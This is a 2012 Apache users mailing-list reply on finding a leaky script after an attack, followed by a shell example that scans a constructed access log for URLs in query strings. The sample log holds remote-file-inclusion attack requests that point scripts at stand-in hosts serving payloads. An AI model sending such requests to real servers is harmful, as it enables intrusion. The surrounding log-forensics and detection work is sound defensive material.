httpd-users mailing list archives

From Jaco Kroon <j...@uls.co.za>
Subject Re: [users@httpd] attack on apache
Date Wed, 11 Jan 2012 21:10:50 GMT
On 11/01/12 22:37, Luisa Ester Navarro wrote:
> J.
> Thanks Jeron:
>              any idea how to start researching which is the leaky script
> Cheers
> Luisa
Hehe, this is where they say RTFS, or, as Jeron suggested, see if you 
can correlate something in the logs.  If Apache is still running and you 
happen to have mod_info, it's useful as it at least gives you the paths 
being processed; often the "child script" will hold up the processing 
and you can then spot the script in use in the mod_info data. In other 
cases, it's a wild goose chase.

mpm_user also helps to narrow things down in case of vhost setups (ISP 
... find the offending user, disable the vhost; that usually gets the 
offender's attention, and when you tell him/her that his code is bust 
and they need to audit their code, they usually end up paying me for my 
time to do it, which usually just involves pointing to one of the latest 
Joomla/WordPress/flavour-of-the-month CMS exploits).

With respect to the logs, often you'll find URIs in the GET parameters, 
so perhaps you can try grepping your logs for a regex, something like 
grep -E "\?.*http://" and see if that shows anything.

I'm afraid there are no real shortcuts.

Good luck.

JK
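Jaco's grep-the-logs suggestion, worked through as an added example that is not part of the thread: constructed access-log lines (not real traffic) are scanned for the `?...http://` pattern he describes, restricted to the request field so a URL in the Referer field alone does not count, and the hits are tallied by script path so the leaky script stands out.

```shell
#!/bin/sh
# Added example. SAMPLE_LOG is a constructed Apache combined-format log,
# embedded so the script runs offline; swap in a real access_log as needed.
SAMPLE_LOG=$(cat <<'EOF'
203.0.113.7 - - [11/Jan/2012:21:00:01 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5123 "http://search.example/" "Mozilla/5.0"
203.0.113.9 - - [11/Jan/2012:21:00:03 +0000] "GET /components/com_example/helper.php?file=http://198.51.100.5/payload.txt HTTP/1.1" 200 912 "-" "libwww-perl/5.8"
203.0.113.9 - - [11/Jan/2012:21:00:04 +0000] "GET /components/com_example/helper.php?file=http://198.51.100.5/payload.txt HTTP/1.1" 200 912 "-" "libwww-perl/5.8"
203.0.113.12 - - [11/Jan/2012:21:00:07 +0000] "GET /wp-content/themes/demo/thumb.php?src=http://198.51.100.22/x.php HTTP/1.1" 200 301 "-" "-"
203.0.113.4 - - [11/Jan/2012:21:00:09 +0000] "GET /about.html HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
EOF
)

# Request lines whose query string carries a URL: the "\?.*http://" pattern
# from the mail, applied only to the quoted request field ($2 when splitting
# on double quotes). A plain grep over the whole line would also match the
# first sample line because of its http:// Referer, which is a false positive.
suspicious_requests() {
    printf '%s\n' "$SAMPLE_LOG" |
        awk -F'"' '$2 ~ /[?].*http:\/\// { print $2 }'
}

# Tally the matching requests by script path (everything before "?"),
# most frequent first, so the script being abused surfaces at the top.
scripts_by_hits() {
    suspicious_requests |
        awk '{ print $2 }' |
        cut -d'?' -f1 |
        sort | uniq -c | sort -rn
}

# The single most likely leaky script: the path with the most hits.
top_suspect() {
    scripts_by_hits | head -n 1 | awk '{ print $2 }'
}

scripts_by_hits
```

On the constructed sample this lists helper.php with two hits and thumb.php with one, while the index.php request with an http:// Referer is correctly left out.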
